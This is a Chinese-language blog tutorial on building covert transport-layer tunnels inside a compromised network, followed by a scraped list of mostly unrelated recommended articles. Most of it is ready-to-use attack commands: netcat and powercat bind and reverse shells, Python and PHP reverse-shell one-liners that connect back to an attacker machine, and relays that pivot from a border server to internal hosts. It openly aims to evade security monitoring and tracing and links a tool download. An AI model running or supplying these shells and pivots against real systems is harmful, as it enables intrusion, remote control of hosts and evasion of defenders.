隐藏通信隧道技术.

隐藏通信隧道就是一种 绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上.

目录:

常用的隧道有以下:

第一步:内网连通性判断.(判断协议能不能通过防火墙.)

用 TCP 协议进行判断有没有连通性.

第二步:搭建 传输层 隧道.

传输层:TCP隧道、UDP隧道、常规端口转发.(这里我演示的是 TCP隧道.)

利用  Netcat  工具.

(1)正向连接(客户端获取服务器的shell.)

(2)反向连接.(服务器获取客户端的shell)

(3)如果目标主机上没有 Netcat,可以利用 python 反向获取 shell.

(4)目标主机上没有 Netcat,可以 PHP 反向获取 shell.

(5)内网代理:

利用  Powercat  工具.

(1)正向连接.

(2)反向连接.

(3)利用 Powercat 进行转发(边界服务器为跳板,跳到内网别的主机上.)


当我们内网收集完信息完,就有进行下一步判断 然后做隧道通信.

(1)进出口流量是否连通的判断,是否出得去,进得来.

(2)在非受信任的网络中实现安全的数据传输.

(3)使用隐蔽的手段逃避安全监测措施和溯源追踪.


常用的隧道有以下:

网络层:IPv6隧道、ICMP隧道、GRE隧道.

传输层:TCP隧道、UDP隧道、常规端口转发.

应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道.


工具下载:

隧道工具  链接:https://pan.baidu.com/s/1tRNwmhOPyj5kwNgKCD6aCA 
                 提取码:tian 


免责声明:

严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。


第一步:内网连通性判断.(判断协议能不能通过防火墙.

用 TCP 协议进行判断有没有连通性.

nc -zv IP 端口号


第二步:搭建 传输层 隧道.

传输层:TCP隧道、UDP隧道、常规端口转发.(这里我演示的是 TCP隧道.)

利用  Netcat  工具.

(1)正向连接(客户端获取服务器的shell.)

外网 攻击机.(IP:192.168.1.103)

nc 【目标的IP地址】 【端口号】  


边界服务器 执行.(IP:192.168.1.105)

nc -lvp 4444 -e /bin/sh                           //linux(4444是端口)
nc -lvp 4444 -e C:\WINDOWS\system32\cmd.exe      //windows(4444是端口)


隧道 搭建完成.( kali IP:192.168.1.103)


(2)反向连接.(服务器获取客户端的shell)

外网 攻击机.(IP:192.168.1.103)

nc -lvp 【端口号】         


边界服务器 执行.(IP:192.168.1.105)

nc 【外网的IP地址】 【端口号】 -e C:\WINDOWS\system32\cmd.exe       


隧道 搭建完成.( kali IP:192.168.1.103)


(3)如果目标主机上没有 Netcat,可以利用 python 反向获取 shell.

外网 攻击机.(IP:192.168.1.103)

Nc -lvp 2222            //监听2222端口.


边界服务器 执行.(IP:192.168.1.104 和 1.1.1.18)( 记得改目标IP地址 和 端口号)

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.103",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


隧道 搭建完成.( kali IP:192.168.1.103)


(4)目标主机上没有 Netcat,可以 PHP 反向获取 shell.

外网 攻击机.(IP:192.168.1.103)

Nc -lvp 2222            //监听2222端口.


边界服务器 执行.(IP:192.168.1.104 和 1.1.1.18)( 记得改目标IP地址 和 端口号)

php -r '$sock=fsockopen("192.168.1.103",2222);exec("/bin/sh -i <&3 >&3 2>&3");'


隧道 搭建完成.( kali IP:192.168.1.103)


(5)内网代理:

外网 攻击机.(IP:192.168.1.104)

nc -lvp 3333 


边界服务器 执行.(IP:192.168.1.106 和 192.168.1.18 )

nc -v 【外网的IP地址】 3333 -c “nc -v 【内网的IP地址】 3333”


内网主机 执行.(IP:1.1.1.22)( 记得改目标IP地址 和 端口号)

nc -lvp 3333 -e /bin/sh


内网代理隧道 搭建完成.( kali IP:192.168.1.104)


利用  Powercat  工具.

(1)正向连接.

边界服务器 执行.(IP:192.168.1.106)

powercat -l  -p 8080 -e /bin/sh             //linux(8080是端口)powercat -l  -p 8080 -e C:\WINDOWS\system32\cmd.exe      //windows(8080是端口)


外网 攻击机.(IP:192.168.1.107)

nc (边界服务器的IP地址) 8080 -vv 


正向连接隧道 搭建完成.( kali IP:192.168.1.107)


(2)反向连接.

外网 攻击机.(IP:192.168.1.107)

nc -l -p 8080 -vv 


边界服务器 执行.(IP:192.168.1.106)

powercat -c (外网的 IP 地址) -p 8080 -v -e /bin/sh         //linux(8080是端口)powercat -c(外网的 IP 地址) -p 8080 -v -e C:\WINDOWS\system32\cmd.exe      //windows(8080是端口)


反向连接隧道 搭建完成.( kali IP:192.168.1.107)


(3)利用 Powercat 进行转发(边界服务器为跳板,跳到内网别的主机上.) 

内网主机 执行.(IP:1.1.1.33)

powercat -l -v -p 9999 -e /bin/sh


边界服务器 执行.(IP:192.168.1.106)

powercat -l -v -p 8000 -r tcp:(内网的 IP 地址):9999


外网 攻击机.(kali:192.168.1.107)

nc (边界服务器 IP 地址) 8000 -vv  


利用 Powercat 进行转发 隧道搭建完成.( kali IP:192.168.1.107)


内网安全 隐藏通信隧道技术——传输层.(遨游于 内网任何主机)相关推荐

  1. 内网安全 隐藏通信隧道技术——应用层.(遨游于 内网任何主机)

    隐藏通信隧道技术. 隐藏通信隧道就是一种 绕过端口屏蔽的通信方式.防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信.当被封装的数据包到达目的地时,将数据包 ...

  2. ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术

    hidden:是否完全隐藏控制面板,还有很多设置参数,比如也可以设置显示面板,然后设置宽高WIDTH="整数" 和 HIGH="整数". 1. 隐藏通信隧道基础 ...

  3. 第三章 隐藏通信隧道技术

    第三章 隐藏通信隧道技术 3.1 隐藏通信隧道基础知识 3.1.1 隐藏通信隧道概述 什么是隧道? 在实际的网络中,通常会通过各种边界设备.软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异 ...

  4. DAY43(DAY44拓展):隐藏通信隧道技术的概述与使用

    DAY43(DAY44拓展):隐藏通信隧道技术的概述与使用 OSI 七层模型 物链网传会表应 常用的隧道技术: (1)网络层:IPv6隧道.ICMP隧道.GRE隧道 (2)传输层:TCP隧道.UDP隧 ...

  5. 内网穿透 frp : 隐藏通信隧道技术

    1 frp介绍 注意事项: 1)服务器端和内网机器端下载的版本要相同,否则可能会影响内网穿透 2)根据服务器系统选择合适的脚本 脚本主要分为服务端与客户端文件 1.外网服务器端用到的是Frps和Frp ...

  6. 隐藏通信隧道技术(下)

    目录 一.传输层隧道技术 1.Netcat获取shell(反向shell) 第一种:如果目标主机安装nc 第二种:目标主机没有安装nc,使用php也可以反弹shell 第三种:使用Python反弹sh ...

  7. 内网渗透之隐藏通信隧道

    前言 在实际的网络中,通常会通过各种边界设备.软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断. 那么什么是隧道呢?隧道就是一种绕过端口屏蔽的通信方式.防火墙两端的数 ...

  8. 红蓝对抗之隧道技术第二篇(reGeorg内网穿透、SSH隧道本地Socks代理、SSH远程转发、Earthworm Socks5代理、Tunna正向代理、ICMP隧道、DNS隧道、Frp穿透)

    文章目录 隧道应用 reGeorg内网穿透 SSH本地转发(正向) 场景一 场景二 SSH远程转发(反向) Earthworm Socks5代理 正向代理 反向代理 Tunna正向代理 ICMP隧道 ...

  9. 内网安全:初探隧道技术

    目录 防火墙必备知识 域控-防火墙组策略对象同步 域控 - 防火墙组策略不出网上线 MSF上线 CS - ICMP上线 注意:隧道技术是后渗透手段,是在已经取得权限后的手段 域控-组策略同步 防火墙必 ...

最新文章

  1. 012_Redis的aof持久化方式
  2. K8S集群的搭建:环境准备及相关命令
  3. 追寻终极数据库 - 事务/分析混合处理系统的交付挑战 (3)
  4. [python进阶]12.继承的优缺点
  5. LiveJournal发展历程
  6. zTree:实现单选/取消父子关联等
  7. IP 层收发报文简要剖析4--ip 报文发送
  8. mql 查询多结果_一篇文章带你全面掌握Excel中的各种数据查询知识与技巧
  9. 微服务与架构师的个人见解
  10. HFS远程命令执行漏洞入侵抓鸡黑阔服务器
  11. hive教程:第一次使用sql
  12. linux 安装Julia
  13. PS图层+移动工具(2)复制删除快捷键 图层分组 前景色填充
  14. python画布删除图形_Matplotlib在savefig之后从画布中清除旧图形
  15. html中div是什么意思
  16. Wpf关于列表动态刷新的问题
  17. SpringBoot 事务管理
  18. c语言数组出界,C语言编游戏如何判断物体是否出界啊?
  19. 爱因斯坦的数学题(C语言)
  20. SCYC55830 58063282A可控硅触发电路

热门文章

  1. zed相机的基本使用
  2. emacs学习笔记(windows使用Emacs eww 上网)
  3. 爬取微信公众号历史记录
  4. 【解决方案】EasyCVR打造明厨亮灶监管平台,保护舌尖上的安全
  5. 天猫店铺交易要转让商标么?
  6. 【论文阅读】Online Obstructive Sleep Apnea Detection onMedical Wearable Sensors
  7. picoCTF,Forensics,取证类,43/50
  8. [世界杯]世界杯不仅仅只是足球
  9. “我要做小小瑶大人的狗!”
  10. 多发射动态调度流水线